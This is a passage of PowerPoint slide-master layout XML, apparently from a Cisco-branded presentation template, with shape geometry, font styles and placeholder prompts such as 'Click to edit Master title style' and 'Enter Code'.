          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FAD7406-5BA6-954A-B3D2-A570C59105CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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1844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60">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="7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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287923" y="1540552"/>
            <a:ext cx="7972248" cy="2278837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="183596" indent="-399958" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" i="1" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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2234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60">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="22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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287923" y="1540552"/>
            <a:ext cx="7972248" cy="2278837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="183596" indent="-399958" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" i="1" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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80405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2"/>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US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC9CA946-420C-0C42-B0CE-8F004647FB82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22702850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p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500064" y="3911436"/>
            <a:ext cx="8139112" cy="525016"/>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bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423822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2"/>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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448786" y="3054518"/>
            <a:ext cx="8364236" cy="560153"/>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a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259629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83744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1"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5" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="3466792"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2018  Cisco and/or its affiliates. All rights reserved.   Cisco Public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308012" y="240632"/>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57535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594" indent="-171446">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189" indent="-165096">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783" indent="-109535">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="911012" indent="-171411">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1082423" indent="-168236">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80574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97481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Bullet_with_Code">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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755866" y="1205898"/>
            <a:ext cx="3886200" cy="3083094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="45710" rIns="0" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="57149" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="174621" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="288918" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="403215" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="517512" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Code</a:t>
            </a:r>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891391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9686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054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347789"/>
            <a:ext cx="8115300"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437768" y="4148221"/>
            <a:ext cx="7180312" cy="326233"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="603560">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Edit Master text styles</a:t>
            </a:r>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20676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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-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p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500063" y="3911435"/>
            <a:ext cx="8139112" cy="525016"/>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6866230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9"/>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437768" y="4148221"/>
            <a:ext cx="7180312" cy="326233"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="603560">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Edit Master text styles</a:t>
            </a:r>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6161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9"/>
            <a:ext cx="8280057" cy="3073946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="285683" marR="0" indent="-285683" algn="ctr" defTabSz="457094"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US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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84503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Half_Page_Blank">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462301" y="1665183"/>
            <a:ext cx="3662024" cy="2925868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="174621" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1110"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="288918" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403215" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="517512" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="631809" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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7" y="341314"/>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200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3568392"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226683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2_Half_Page_Text">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3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="419101" y="1657350"/>
            <a:ext cx="3827463" cy="18288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5097464" y="531812"/>
            <a:ext cx="3551237" cy="4059237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="169859" indent="-169859">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="228594" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="346067" indent="-171446">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="457189" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="574661" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="744520" indent="-112710">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="3466792"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182448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_Half_Page_Text_2 column">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mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437767"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5097464" y="510540"/>
            <a:ext cx="3551237" cy="4080510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114297" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228594" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342892" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457189" indent="-123822">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574661" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>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37767" y="1659843"/>
            <a:ext cx="3808797" cy="2931208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114297" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228594" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342892" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457189" indent="-123822">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574661" indent="-117472">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">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4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3359215"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40323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2675">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4_Half_Page_Picture_Caption">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5089526" y="531813"/>
            <a:ext cx="3559175" cy="3364846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089526" y="4062351"/>
            <a:ext cx="3559175" cy="525145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="2863168"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34967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5_Half_Page_Picture">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endParaRPr>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5089526" y="531814"/>
            <a:ext cx="3559175" cy="4059236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3263592"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81326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6_Half_Page_Headline Only">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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="2946839"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349989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7_Half_Page_Picture_Full">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4580093" y="0"/>
            <a:ext cx="4563907" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
